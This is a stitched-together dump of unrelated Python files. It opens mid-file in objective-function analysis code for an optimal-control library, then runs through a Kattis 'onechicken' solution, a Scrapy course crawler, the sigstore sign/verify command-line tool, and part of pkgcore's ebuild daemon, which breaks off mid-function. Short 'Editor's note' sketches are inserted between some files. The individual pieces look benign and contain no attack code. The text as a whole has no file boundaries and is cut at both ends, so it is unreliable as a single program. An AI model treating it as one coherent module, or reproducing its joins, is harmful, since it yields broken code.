(PenaltyType.TRACK_MARKERS_VELOCITY,) ALIGN_MARKERS = (PenaltyType.ALIGN_MARKERS,) PROPORTIONAL_STATE = (PenaltyType.PROPORTIONAL_STATE,) PROPORTIONAL_CONTROL = (PenaltyType.PROPORTIONAL_CONTROL,) MINIMIZE_TORQUE = (PenaltyType.MINIMIZE_TORQUE,) TRACK_TORQUE = (PenaltyType.TRACK_TORQUE,) MINIMIZE_MUSCLES_CONTROL = (PenaltyType.MINIMIZE_MUSCLES_CONTROL,) TRACK_MUSCLES_CONTROL = (PenaltyType.TRACK_MUSCLES_CONTROL,) MINIMIZE_ALL_CONTROLS = (PenaltyType.MINIMIZE_ALL_CONTROLS,) TRACK_ALL_CONTROLS = (PenaltyType.TRACK_ALL_CONTROLS,) MINIMIZE_CONTACT_FORCES = (PenaltyType.MINIMIZE_CONTACT_FORCES,) TRACK_CONTACT_FORCES = (PenaltyType.TRACK_CONTACT_FORCES,) MINIMIZE_PREDICTED_COM_HEIGHT = (PenaltyType.MINIMIZE_PREDICTED_COM_HEIGHT,) ALIGN_SEGMENT_WITH_CUSTOM_RT = (PenaltyType.ALIGN_SEGMENT_WITH_CUSTOM_RT,) ALIGN_MARKER_WITH_SEGMENT_AXIS = (PenaltyType.ALIGN_MARKER_WITH_SEGMENT_AXIS,) CUSTOM = (PenaltyType.CUSTOM,) @staticmethod def get_type(): """Returns the type of the objective function""" return ObjectiveFunction.MayerFunction class Parameter(Enum): CUSTOM = (PenaltyType.CUSTOM,) class Analyse: def __init__(self, ocp, sol_obj): self.ocp = ocp self.sol_obj = sol_obj def by_function(self): for idx_phase, phase in enumerate(self.sol_obj): print(f"********** Phase {idx_phase} **********") for idx_obj in range(phase.shape[0]): print( f"{self.ocp.original_values["objective_functions"][idx_phase][idx_phase + idx_obj].type.name} : {np.nansum(phase[idx_obj])}" ) def by_nodes(self): for idx_phase, phase in enumerate(self.sol_obj): print(f"********** Phase 
{idx_phase} **********") for idx_node in range(phase.shape[1]): print(f"Node {idx_node} : {np.nansum(phase[:, idx_node])}") def mean(self): m = 0 for idx_phase, phase in enumerate(self.sol_obj): m += np.nansum(phase) return m / len(self.sol_obj) @staticmethod def get_objective_values(ocp, sol): def __get_instant(instants, nlp): nodes = [] for node in instants: if isinstance(node, int): if node < 0 or node > nlp["ns"]: raise RuntimeError(f"Invalid instant, {node} must be between 0 and {nlp['ns']}") nodes.append(node) elif node == Instant.START: nodes.append(0) elif node == Instant.MID: if nlp["ns"] % 2 == 1: raise (ValueError("Number of shooting points must be even to use MID")) nodes.append(nlp["ns"] // 2) elif node == Instant.INTERMEDIATES: for i in range(1, nlp["ns"] - 1): nodes.append(i) elif node == Instant.END: nodes.append(nlp["ns"] - 1) elif node == Instant.ALL: for i in range(nlp["ns"]): nodes.append(i) return nodes sol = sol["x"] out = [] for idx_phase, nlp in enumerate(ocp.nlp): nJ = len(nlp["J"]) - idx_phase out.append(np.ndarray((nJ, nlp["ns"]))) out[-1][:][:] = np.nan for idx_obj_func in range(nJ): nodes = __get_instant(nlp["J"][idx_phase + idx_obj_func][0]["objective"].instant, nlp) nodes = nodes[: len(nlp["J"][idx_phase + idx_obj_func])] for node, idx_node in enumerate(nodes): obj = casadi.Function( "obj", [ocp.V], [get_objective_value(nlp["J"][idx_phase + idx_obj_func][node])] ) out[-1][idx_obj_func][idx_node] = obj(sol) return out def get_objective_value(j_dict): val = j_dict["val"] if j_dict["target"] is not None: val -= j_dict["target"] if j_dict["objective"].quadratic: val = dot(val, val) else: val = sum1(val) val *= j_dict["objective"].weight * j_dict["dt"] return val
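# --- Editor's note: the sketch below is not part of the original module. It is a
# minimal plain-numpy analogue of get_objective_value() above, added only to make
# the weighting rule explicit: the (optionally target-shifted) value is squared via
# a dot product when the objective is quadratic, summed otherwise, then scaled by
# weight * dt. The function name is hypothetical.
import numpy as np

def weighted_objective(val, target=None, quadratic=True, weight=1.0, dt=1.0):
    residual = np.asarray(val, dtype=float)
    if target is not None:
        residual = residual - np.asarray(target, dtype=float)
    # quadratic -> dot(residual, residual); otherwise -> sum1(residual)
    cost = float(residual @ residual) if quadratic else float(residual.sum())
    return cost * weight * dt

# Example: tracking a 2-state target with a quadratic penalty over dt = 0.1
assert abs(weighted_objective([1.0, 2.0], target=[0.5, 1.5], weight=10, dt=0.1) - 0.5) < 1e-12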
''' Kattis - onechicken Just do. Time: O(1), Space: O(1) ''' a, b = map(int, input().split()) if b > a: print(f"Dr. Chaz will have {b-a} piece{'s' if b-a > 1 else ''} of chicken left over!") else: print(f"Dr. Chaz needs {a-b} more piece{'s' if a-b > 1 else ''} of chicken!")
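# --- Editor's note: a self-contained check, not part of the original solution,
# mirroring the branch logic above so the expected Kattis outputs are explicit
# (including the singular/plural suffix handling).
def chaz_message(a: int, b: int) -> str:
    if b > a:
        return f"Dr. Chaz will have {b-a} piece{'s' if b-a > 1 else ''} of chicken left over!"
    return f"Dr. Chaz needs {a-b} more piece{'s' if a-b > 1 else ''} of chicken!"

assert chaz_message(5, 8) == "Dr. Chaz will have 3 pieces of chicken left over!"
assert chaz_message(9, 8) == "Dr. Chaz needs 1 more piece of chicken!"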
# -*- coding: utf-8 -*- from abc import ABC from pathlib import Path import pandas as pd import scrapy from src.crawl.utils import cleanup from settings import YEAR, CRAWLING_OUTPUT_FOLDER BASE_URl = "http://progcours.hers.be/cocoon/cours/{}.html" PROG_DATA_PATH = Path(__file__).parent.absolute().joinpath( f'../../../../{CRAWLING_OUTPUT_FOLDER}hers_programs_{YEAR}.json') LANGUAGES_DICT = { "Langue française": 'fr', "Langue anglaise": 'en', "Langue allemande": 'de', "Langue néerlandaise": 'nl', "Langue espagnole": 'es' } class HERSCourseSpider(scrapy.Spider, ABC): """ Courses crawler for Haute Ecole Robert Schuman """ # Warning: error on HVAC0001-1, http://progcours.hers.be/cocoon/cours/HVAC0001-1.html name = "hers-courses" custom_settings = { 'FEED_URI': Path(__file__).parent.absolute().joinpath( f'../../../../{CRAWLING_OUTPUT_FOLDER}hers_courses_{YEAR}.json').as_uri() } def start_requests(self): courses_ids = pd.read_json(open(PROG_DATA_PATH, "r"))["courses"] courses_ids_list = sorted(list(set(courses_ids.sum()))) for course_id in courses_ids_list: yield scrapy.Request(BASE_URl.format(course_id), self.parse_main, cb_kwargs={"course_id": course_id}) @staticmethod def parse_main(response, course_id): course_name = response.xpath("////td[@class='LibCours']/text()").get() if course_name is None: yield { "id": course_id, "name": '', "year": f"{YEAR}-{int(YEAR) + 1}", "languages": ["fr"], "teachers": [], "url": response.url, "content": '', "goal": '', "activity": '', "other": '' } return years = response.xpath("//div[@id='TitrePrinc']/text()").get().split(" ")[-1] course_rubric_txt = "//div[@class='TitreRubCours' and contains(text(), \"{}\")]" teachers = cleanup(response.xpath(f"{course_rubric_txt.format('prof')}/following::tr[1]//a").getall()) teachers += cleanup(response.xpath(f"{course_rubric_txt.format('Coord')}/following::tr[1]//a").getall()) teachers = [t.replace(" ", '') for t in teachers] teachers = list(set(teachers)) teachers = [" ".join(teacher.split(" ")[1:]) + " " + teacher.split(" ")[0].strip(" ") for teacher in teachers] languages = response.xpath(course_rubric_txt.format("Langue(s)") + "/following::td[2]/text()").getall() languages = [LANGUAGES_DICT[l] for l in languages] languages = ['fr'] if len(languages) == 0 else languages # Course description def get_sections_text(section_name_prec, section_name_follow): texts = cleanup(response.xpath(f"//tr[preceding::tr[@id='rub_{section_name_prec}'] " f"and following::tr[@id='rub_{section_name_follow}']]").getall()) return '\n'.join(texts).strip("\n") content = get_sections_text('APER', 'OBJT') goal = get_sections_text('OBJT', 'PRER') activity = get_sections_text('TRPR', 'ORGA') yield { 'id': course_id, 'name': course_name, 'year': years, 'languages': languages, 'teachers': teachers, 'url': response.url, 'content': content, 'goal': goal, 'activity': activity, 'other': '' }
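# --- Editor's note: a minimal sketch, not part of the original spider, showing one
# way to run the crawler above programmatically instead of `scrapy crawl hers-courses`.
# It assumes this module is importable and that the PROG_DATA_PATH JSON already
# exists; CrawlerProcess is standard Scrapy API and honors the spider's
# custom_settings (including FEED_URI).
from scrapy.crawler import CrawlerProcess

if __name__ == "__main__":
    process = CrawlerProcess()
    process.crawl(HERSCourseSpider)
    process.start()  # blocks until the crawl finishes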
# Copyright 2022 The Sigstore Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import logging import os import sys from importlib import resources from pathlib import Path from textwrap import dedent from typing import TextIO, cast from sigstore import __version__ from sigstore._internal.fulcio.client import DEFAULT_FULCIO_URL, FulcioClient from sigstore._internal.oidc.ambient import detect_credential from sigstore._internal.oidc.issuer import Issuer from sigstore._internal.oidc.oauth import ( DEFAULT_OAUTH_ISSUER, STAGING_OAUTH_ISSUER, get_identity_token, ) from sigstore._internal.rekor.client import DEFAULT_REKOR_URL, RekorClient from sigstore._sign import Signer from sigstore._verify import ( CertificateVerificationFailure, VerificationFailure, Verifier, ) logger = logging.getLogger(__name__) logging.basicConfig(level=os.environ.get("SIGSTORE_LOGLEVEL", "INFO").upper()) class _Embedded: """ A repr-wrapper for reading embedded resources, needed to help `argparse` render defaults correctly. """ def __init__(self, name: str) -> None: self._name = name def read(self) -> bytes: return resources.read_binary("sigstore._store", self._name) def __repr__(self) -> str: return f"{self._name} (embedded)" def _parser() -> argparse.ArgumentParser: parser = argparse.ArgumentParser( prog="sigstore", description="a tool for signing and verifying Python package distributions", formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument( "-V", "--version", action="version", version=f"%(prog)s {__version__}" ) subcommands = parser.add_subparsers(required=True, dest="subcommand") # `sigstore sign` sign = subcommands.add_parser( "sign", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) oidc_options = sign.add_argument_group("OpenID Connect options") oidc_options.add_argument( "--identity-token", metavar="TOKEN", type=str, help="the OIDC identity token to use", ) oidc_options.add_argument( "--oidc-client-id", metavar="ID", type=str, default="sigstore", help="The custom OpenID Connect client ID to use during OAuth2", ) oidc_options.add_argument( "--oidc-client-secret", metavar="SECRET", type=str, help="The custom OpenID Connect client secret to use during OAuth2", ) oidc_options.add_argument( "--oidc-disable-ambient-providers", action="store_true", help="Disable ambient OpenID Connect credential detection (e.g. 
on GitHub Actions)", ) output_options = sign.add_argument_group("Output options") output_options.add_argument( "--no-default-files", action="store_true", help="Don't emit the default output files ({input}.sig and {input}.crt)", ) output_options.add_argument( "--output-signature", metavar="FILE", type=Path, help=( "Write a single signature to the given file; conflicts with --output and " "does not work with multiple input files" ), ) output_options.add_argument( "--output-certificate", metavar="FILE", type=Path, help=( "Write a single certificate to the given file; conflicts with --output and " "does not work with multiple input files" ), ) output_options.add_argument( "--overwrite", action="store_true", help="Overwrite preexisting signature and certificate outputs, if present", ) instance_options = sign.add_argument_group("Sigstore instance options") instance_options.add_argument( "--fulcio-url", metavar="URL", type=str, default=DEFAULT_FULCIO_URL, help="The Fulcio instance to use (conflicts with --staging)", ) instance_options.add_argument( "--rekor-url", metavar="URL", type=str, default=DEFAULT_REKOR_URL, help="The Rekor instance to use (conflicts with --staging)", ) instance_options.add_argument( "--ctfe", dest="ctfe_pem", metavar="FILE", type=argparse.FileType("rb"), help="A PEM-encoded public key for the CT log (conflicts with --staging)", default=_Embedded("ctfe.pub"), ) instance_options.add_argument( "--rekor-root-pubkey", metavar="FILE", type=argparse.FileType("rb"), help="A PEM-encoded root public key for Rekor itself (conflicts with --staging)", default=_Embedded("rekor.pub"), ) instance_options.add_argument( "--oidc-issuer", metavar="URL", type=str, default=DEFAULT_OAUTH_ISSUER, help="The OpenID Connect issuer to use (conflicts with --staging)", ) instance_options.add_argument( "--staging", action="store_true", help="Use sigstore's staging instances, instead of the default production instances", ) sign.add_argument( "files", metavar="FILE", type=Path, nargs="+", help="The file to sign", ) # `sigstore verify` verify = subcommands.add_parser( "verify", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) input_options = verify.add_argument_group("Verification inputs") input_options.add_argument( "--certificate", "--cert", metavar="FILE", type=Path, help="The PEM-encoded certificate to verify against; not used with multiple inputs", ) input_options.add_argument( "--signature", metavar="FILE", type=Path, help="The signature to verify against; not used with multiple inputs", ) verification_options = verify.add_argument_group("Extended verification options") verification_options.add_argument( "--cert-email", metavar="EMAIL", type=str, help="The email address to check for in the certificate's Subject Alternative Name", ) verification_options.add_argument( "--cert-oidc-issuer", metavar="URL", type=str, help="The OIDC issuer URL to check for in the certificate's OIDC issuer extension", ) instance_options = verify.add_argument_group("Sigstore instance options") instance_options.add_argument( "--rekor-url", metavar="URL", type=str, default=DEFAULT_REKOR_URL, help="The Rekor instance to use (conflicts with --staging)", ) instance_options.add_argument( "--staging", action="store_true", help="Use sigstore's staging instances, instead of the default production instances", ) verify.add_argument( "files", metavar="FILE", type=Path, nargs="+", help="The file to verify", ) return parser def main() -> None: parser = _parser() args = parser.parse_args() logger.debug(f"parsed arguments {args}") # 
Stuff the parser back into our namespace, so that we can use it for # error handling later. args._parser = parser if args.subcommand == "sign": _sign(args) elif args.subcommand == "verify": _verify(args) else: parser.error(f"Unknown subcommand: {args.subcommand}") def _sign(args: argparse.Namespace) -> None: # `--no-default-files` has no effect on `--output-{signature,certificate}`, # but we forbid it because it indicates user confusion. if args.no_default_files and (args.output_signature or args.output_certificate): args._parser.error( "--no-default-files may not be combined with " "--output-signature or --output-certificate", ) # Fail if `--output-signature` or `--output-certificate` is specified # *and* we have more than one input. if (args.output_signature or args.output_certificate) and len(args.files) > 1: args._parser.error( "Error: --output-signature and --output-certificate can't be used with " "explicit outputs for multiple inputs; consider using --output", ) # Build up the map of inputs -> outputs ahead of any signing operations, # so that we can fail early if overwriting without `--overwrite`. output_map = {} for file in args.files: if not file.is_file(): args._parser.error(f"Input must be a file: {file}") sig, cert = args.output_signature, args.output_certificate if not sig and not cert and not args.no_default_files: sig = file.parent / f"{file.name}.sig" cert = file.parent / f"{file.name}.crt" if not args.overwrite: extants = [] if sig and sig.exists(): extants.append(str(sig)) if cert and cert.exists(): extants.append(str(cert)) if extants: args._parser.error( "Refusing to overwrite outputs without --overwrite: " f"{', '.join(extants)}" ) output_map[file] = {"cert": cert, "sig": sig} # Select the signer to use. if args.staging: logger.debug("sign: staging instances requested") signer = Signer.staging() args.oidc_issuer = STAGING_OAUTH_ISSUER elif args.fulcio_url == DEFAULT_FULCIO_URL and args.rekor_url == DEFAULT_REKOR_URL: signer = Signer.production() else: signer = Signer( fulcio=FulcioClient(args.fulcio_url), rekor=RekorClient( args.rekor_url, args.rekor_root_pubkey.read(), args.ctfe_pem.read() ), ) # The order of precedence is as follows: # # 1) Explicitly supplied identity token # 2) Ambient credential detected in the environment, unless disabled # 3) Interactive OAuth flow if not args.identity_token and not args.oidc_disable_ambient_providers: args.identity_token = detect_credential() if not args.identity_token: issuer = Issuer(args.oidc_issuer) if args.oidc_client_secret is None: args.oidc_client_secret = "" # nosec: B105 args.identity_token = get_identity_token( args.oidc_client_id, args.oidc_client_secret, issuer, ) if not args.identity_token: args._parser.error("No identity token supplied or detected!") for file, outputs in output_map.items(): logger.debug(f"signing for {file.name}") result = signer.sign( input_=file.read_bytes(), identity_token=args.identity_token, ) print("Using ephemeral certificate:") print(result.cert_pem) print(f"Transparency log entry created at index: {result.log_entry.log_index}") sig_output: TextIO if outputs["sig"]: sig_output = outputs["sig"].open("w") else: sig_output = sys.stdout print(result.b64_signature, file=sig_output) if outputs["sig"]: print(f"Signature written to file {outputs['sig']}") if outputs["cert"] is not None: cert_output = open(outputs["cert"], "w") print(result.cert_pem, file=cert_output) print(f"Certificate written to file {outputs['cert']}") def _verify(args: argparse.Namespace) -> None: # Fail if `--certificate` 
or `--signature` is specified and we have more than one input. if (args.certificate or args.signature) and len(args.files) > 1: args._parser.error( "--certificate and --signature can only be used with a single input file" ) # The converse of `sign`: we build up an expected input map and check # that we have everything so that we can fail early. input_map = {} for file in args.files: if not file.is_file(): args._parser.error(f"Input must be a file: {file}") sig, cert = args.signature, args.certificate if sig is None: sig = file.parent / f"{file.name}.sig" if cert is None: cert = file.parent / f"{file.name}.crt" missing = [] if not sig.is_file(): missing.append(str(sig)) if not cert.is_file(): missing.append(str(cert)) if missing: args._parser.error( f"Missing verification materials for {(file)}: {', '.join(missing)}" ) input_map[file] = {"cert": cert, "sig": sig} if args.staging: logger.debug("verify: staging instances requested") verifier = Verifier.staging() elif args.rekor_url == DEFAULT_REKOR_URL: verifier = Verifier.production() else: # TODO: We need CLI flags that allow the user to figure the Fulcio cert chain # for verification. args._parser.error( "Custom Rekor and Fulcio configuration for verification isn't fully supported yet!", ) for file, inputs in input_map.items(): # Load the signing certificate logger.debug(f"Using certificate from: {inputs['cert']}") certificate = inputs["cert"].read_bytes() # Load the signature logger.debug(f"Using signature from: {inputs['sig']}") signature = inputs["sig"].read_bytes() logger.debug(f"Verifying contents from: {file}") result = verifier.verify( input_=file.read_bytes(), certificate=certificate, signature=signature, expected_cert_email=args.cert_email, expected_cert_oidc_issuer=args.cert_oidc_issuer, ) if result: print(f"OK: {file}") else: result = cast(VerificationFailure, result) print(f"FAIL: {file}") print(f"Failure reason: {result.reason}", file=sys.stderr) if isinstance(result, CertificateVerificationFailure): # If certificate verification failed, it's either because of # a chain issue or some outdated state in sigstore itself. # These might already be resolved in a newer version, so # we suggest that users try to upgrade and retry before # anything else. print( dedent( f""" This may be a result of an outdated `sigstore` installation. Consider upgrading with: python -m pip install --upgrade sigstore Additional context: {result.exception} """ ), file=sys.stderr, ) sys.exit(1)
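# --- Editor's note (not part of the original module): hypothetical invocations of
# the CLI defined above, derived from its argument parser; the file names are
# illustrative only:
#
#   sigstore sign foo.txt
#       -> writes foo.txt.sig and foo.txt.crt next to the input by default
#   sigstore sign --overwrite foo.txt
#       -> same, but permits clobbering preexisting outputs
#   sigstore verify --cert-email dev@example.com foo.txt
#       -> expects foo.txt.sig and foo.txt.crt unless --signature/--certificate
#          are passed explicitly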
""" EBuild Daemon (ebd), main high level interface to ebuild execution env. Wraps :obj:`pkgcore.ebuild.processor` functionality into a higher level api, for example per phase methods. """ __all__ = ( "ebd", "setup_mixin", "install_op", "uninstall_op", "replace_op", "buildable", "binpkg_localize") import errno import os import re import shutil import sys import time from collections import defaultdict from functools import partial from itertools import chain from tempfile import TemporaryFile from snakeoil import data_source, klass from snakeoil.compatibility import IGNORED_EXCEPTIONS from snakeoil.contexts import chdir from snakeoil.currying import post_curry, pretty_docs from snakeoil.fileutils import touch from snakeoil.osutils import ensure_dirs, listdir_files, normpath, pjoin from snakeoil.process.spawn import is_sandbox_capable, is_userpriv_capable, spawn, spawn_bash from snakeoil.sequences import iflatten_instance, iter_stable_unique from .. import const from ..log import logger from ..operations import format, observer from ..os_data import portage_gid, portage_uid, xargs from ..package.mutated import MutatedPkg from . import ebd_ipc, ebuild_built, errors from .processor import (ProcessorError, chuck_UnhandledCommand, expected_ebuild_env, inherit_handler, release_ebuild_processor, request_ebuild_processor) class ebd: def __init__(self, pkg, initial_env=None, env_data_source=None, observer=None, clean=True, tmp_offset=None): """ :param pkg: :class:`pkgcore.ebuild.ebuild_src.package` instance this env is being setup for :param initial_env: initial environment to use for this ebuild :param env_data_source: a :obj:`snakeoil.data_source.base` instance to restore the environment from- used for restoring the state of an ebuild processing, whether for unmerging, or walking phases during building """ self.pkg = pkg self.eapi = pkg.eapi if not hasattr(self, "observer"): self.observer = observer if not self.eapi.is_supported: raise TypeError(f"package {pkg} uses unsupported EAPI: {str(self.eapi)!r}") if initial_env is not None: # copy. self.env = dict(initial_env) for x in ("USE", "ACCEPT_LICENSE"): self.env.pop(x, None) else: self.env = {} # Drop all USE_EXPAND variables from the exported environment. for u in self.domain.profile.use_expand: self.env.pop(u, None) # Only export USE_EXPAND variables for the package's enabled USE flags. 
d = defaultdict(list) for u in pkg.use: m = self.domain.use_expand_re.match(u) if m: use_expand, value = m.groups() d[use_expand.upper()].append(value) for k, v in d.items(): self.env[k] = ' '.join(sorted(v)) self.bashrc = self.env.pop("bashrc", ()) self.features = set(x.lower() for x in self.domain.features) self.env["FEATURES"] = ' '.join(sorted(self.features)) self.set_path_vars(self.env, self.pkg, self.domain) # internally implemented EAPI specific functions to skip when exporting env self.env["PKGCORE_EAPI_FUNCS"] = ' '.join(self.eapi.bash_funcs) self.env_data_source = env_data_source if (env_data_source is not None and not isinstance(env_data_source, data_source.base)): raise TypeError( "env_data_source must be None, or a pkgcore.data_source.base " f"derivative: {env_data_source.__class__}: {env_data_source}") iuse_effective_regex = f"^({'|'.join(re.escape(x) for x in pkg.iuse_effective)})$" self.env["PKGCORE_IUSE_EFFECTIVE"] = iuse_effective_regex.replace("\\.\\*", ".*") expected_ebuild_env(pkg, self.env, env_source_override=self.env_data_source) self.env["PKGCORE_FINALIZED_RESTRICT"] = ' '.join(str(x) for x in pkg.restrict) self.restrict = pkg.restrict for x in ("sandbox", "userpriv"): setattr(self, x, self.feat_or_bool(x) and not (x in self.restrict)) if self.userpriv and os.getuid() != 0: self.userpriv = False if "PORT_LOGDIR" in self.env: self.logging = pjoin( self.env["PORT_LOGDIR"], "%s:%s:%s.log" % ( pkg.cpvstr, self.__class__.__name__, time.strftime("%Y%m%d-%H%M%S", time.localtime()))) del self.env["PORT_LOGDIR"] else: self.logging = False self.env["PKGCORE_PKG_REPO"] = pkg.source_repository self.env["XARGS"] = xargs # wipe variables listed in ENV_UNSET for supporting EAPIs if self.eapi.options.has_env_unset: for x in self.env.pop('ENV_UNSET', ()): self.env.pop(x, None) # wipe any remaining internal settings from the exported env wipes = [k for k, v in self.env.items() if not isinstance(v, str)] for k in wipes: del self.env[k] self._set_op_vars(tmp_offset) self.clean_at_start = clean self.clean_needed = False # various IPC command support self._ipc_helpers = { # bash helpers 'doins': ebd_ipc.Doins(self), 'dodoc': ebd_ipc.Dodoc(self), 'dohtml': ebd_ipc.Dohtml(self), 'doinfo': ebd_ipc.Doinfo(self), 'dodir': ebd_ipc.Dodir(self), 'doexe': ebd_ipc.Doexe(self), 'dobin': ebd_ipc.Dobin(self), 'dosbin': ebd_ipc.Dosbin(self), 'dolib': ebd_ipc.Dolib(self), 'dolib.so': ebd_ipc.Dolib_so(self), 'dolib.a': ebd_ipc.Dolib_a(self), 'doman': ebd_ipc.Doman(self), 'domo': ebd_ipc.Domo(self), 'dosym': ebd_ipc.Dosym(self), 'dohard': ebd_ipc.Dohard(self), 'keepdir': ebd_ipc.Keepdir(self), # bash functions 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), 'unpack': ebd_ipc.Unpack(self), 'eapply': ebd_ipc.Eapply(self), 'eapply_user': ebd_ipc.Eapply_User(self), 'docompress': ebd_ipc.Docompress(self), 'dostrip': ebd_ipc.Dostrip(self), # internals 'filter_env': ebd_ipc.FilterEnv(self), } def start(self): if self.clean_at_start: self.clean_needed = True if not self.cleanup(): return False self.setup_workdir() self._setup_env_data_source() self.clean_needed = True return True @staticmethod def set_path_vars(env, pkg, domain): # XXX: note this is just EAPI 3 and EAPI 7 compatibility; not full prefix, soon.. 
trailing_slash = pkg.eapi.options.trailing_slash env['ROOT'] = domain.root.rstrip(os.sep) + trailing_slash env['PKGCORE_PREFIX_SUPPORT'] = 'false' if pkg.eapi.options.prefix_capable: env['EPREFIX'] = domain.prefix.rstrip(os.sep) env['EROOT'] = ( pjoin(env['ROOT'].rstrip(trailing_slash), env['EPREFIX']) + trailing_slash) env['PKGCORE_PREFIX_SUPPORT'] = 'true' if pkg.eapi.options.has_sysroot: env['SYSROOT'] = env['ROOT'] env['ESYSROOT'] = pjoin(env['SYSROOT'], env['EPREFIX']) env['BROOT'] = env['EPREFIX'] def _set_op_vars(self, tmp_offset): # don't fool with this, without fooling with setup. self.tmpdir = self.domain.pm_tmpdir if tmp_offset: self.tmpdir = pjoin(self.tmpdir, tmp_offset.strip(os.sep)) self.builddir = pjoin(self.tmpdir, self.env["CATEGORY"], self.env["PF"]) for x, y in (("T", "temp"), ("WORKDIR", "work"), ("D", "image"), ("HOME", "homedir"), ("PKGCORE_EMPTYDIR", "empty")): self.env[x] = normpath(pjoin(self.builddir, y)) self.env["D"] += self.eapi.options.trailing_slash self.env["PORTAGE_LOGFILE"] = normpath(pjoin(self.env["T"], "build.log")) # XXX: Note that this is just EAPI 3 support, not yet prefix # full awareness. if self.pkg.eapi.options.prefix_capable: self.env["ED"] = normpath( pjoin(self.env["D"].rstrip(os.sep), self.env["EPREFIX"])) \ + self.eapi.options.trailing_slash # temporary install dir correct for all EAPIs self.ED = self.env.get('ED', self.env['D']) def get_env_source(self): with open(pjoin(self.env["T"], "environment"), "rb") as f: return data_source.bytes_data_source(f.read()) def _setup_env_data_source(self): if not ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env['T'], "%s doesn't fulfill minimum mode %o and gid %i" % ( self.env['T'], 0o770, portage_gid)) if self.env_data_source is not None: fp = pjoin(self.env["T"], "environment") # load data first (might be a local_source), *then* write # if it's a src_ebuild being installed, trying to do two steps # stomps the local_sources data. data = self.env_data_source.bytes_fileobj().read() with open(fp, "wb") as f: f.write(data) del data def _set_per_phase_env(self, phase, env): self._setup_merge_type(phase, env) # add phase specific helper paths to PATH if they exist ebuild_phase = self.eapi.phases.get(phase, '') if ebuild_phase in self.eapi.helpers: path = chain.from_iterable(( const.PATH_FORCED_PREPEND, self.pkg.eapi.helpers.get('global', ()), self.eapi.helpers[ebuild_phase], os.environ.get('PATH', '').split(os.pathsep), )) env['PATH'] = os.pathsep.join(path) def _setup_merge_type(self, phase, env): # only allowed in pkg_ phases. if (not self.eapi.phases.get(phase, "").startswith("pkg_") and not phase == 'setup-binpkg'): return # note all pkgs have this attribute is_source = getattr(self.pkg, '_is_from_source', True) if self.eapi.options.has_merge_type: env["MERGE_TYPE"] = (is_source and "source") or "binary" else: # we still must export this, just via the portage var name w/ # different values. if we didn't, spec or not, kernel binpkg # merging would be broke. env["EMERGE_FROM"] = (is_source and "ebuild") or "binary" def setup_logging(self): if self.logging and not ensure_dirs(os.path.dirname(self.logging), mode=0o2770, gid=portage_gid): raise format.FailedDirectory( os.path.dirname(self.logging), "PORT_LOGDIR, desired mode 02770 and gid %i" % portage_gid) def setup_workdir(self): # ensure dirs. 
for k in ("HOME", "T", "WORKDIR", "D"): if not ensure_dirs(self.env[k], mode=0o4770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env[k], "%s doesn't fulfill minimum mode %o and gid %i" % (k, 0o770, portage_gid)) # XXX hack, just 'til pkgcore controls these directories if (os.stat(self.env[k]).st_mode & 0o2000): logger.warning(f"{self.env[k]} ( {k} ) is setgid") def _generic_phase(self, phase, userpriv, sandbox, extra_handlers={}, failure_allowed=False, suppress_bashrc=False): """ :param phase: phase to execute :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? """ if phase not in self.pkg.mandatory_phases: # TODO(ferringb): Note the preinst hack; this will be removed once dyn_pkg_preinst # is dead in full (currently it has a selinux labelling and suidctl ran from there) if phase != 'preinst': return True if 'selinux' not in self.features and 'suidctl' not in self.features: return True shutil.rmtree(self.env["PKGCORE_EMPTYDIR"], ignore_errors=True) os.mkdir(self.env["PKGCORE_EMPTYDIR"]) userpriv = self.userpriv and userpriv sandbox = self.sandbox and sandbox self._set_per_phase_env(phase, self.env) extra_handlers = extra_handlers.copy() extra_handlers.update(self._ipc_helpers) if not suppress_bashrc: extra_handlers.setdefault("request_bashrcs", self._request_bashrcs) return run_generic_phase( self.pkg, phase, self.env, userpriv, sandbox, extra_handlers=extra_handlers, failure_allowed=failure_allowed, logging=self.logging) def _request_bashrcs(self, ebd): for source in self.domain.get_package_bashrcs(self.pkg): if source.path is not None: ebd.write(f"path\n{source.path}") elif source.get_data is not None: raise NotImplementedError else: chuck_UnhandledCommand( ebd, "bashrc request: unable to process bashrc " f"due to source '{source}' due to lacking usable get_*") if not ebd.expect("next"): chuck_UnhandledCommand( ebd, "bashrc transfer, didn't receive 'next' response. " "failure?") ebd.write("end_request") def set_is_replacing(self, *pkgs): if self.eapi.options.exports_replacing: self.env['REPLACING_VERSIONS'] = " ".join(pkg.PVR for pkg in pkgs) def set_is_being_replaced_by(self, pkg=None): if self.eapi.options.exports_replacing and pkg is not None: self.env['REPLACED_BY_VERSION'] = pkg.PVR def cleanup(self, disable_observer=False, force=False): if not force: if not self.clean_needed: return True if not os.path.exists(self.builddir): return True if disable_observer: return self.do_cleanup(disable_observer=disable_observer) return self.do_cleanup() @observer.decorate_build_method("cleanup") def do_cleanup(self): try: shutil.rmtree(self.builddir) # try to wipe the cat dir; if not empty, ignore it try: os.rmdir(os.path.dirname(self.builddir)) except EnvironmentError as e: # POSIX specifies either ENOTEMPTY or EEXIST for non-empty dir # in particular, Solaris uses EEXIST in that case. 
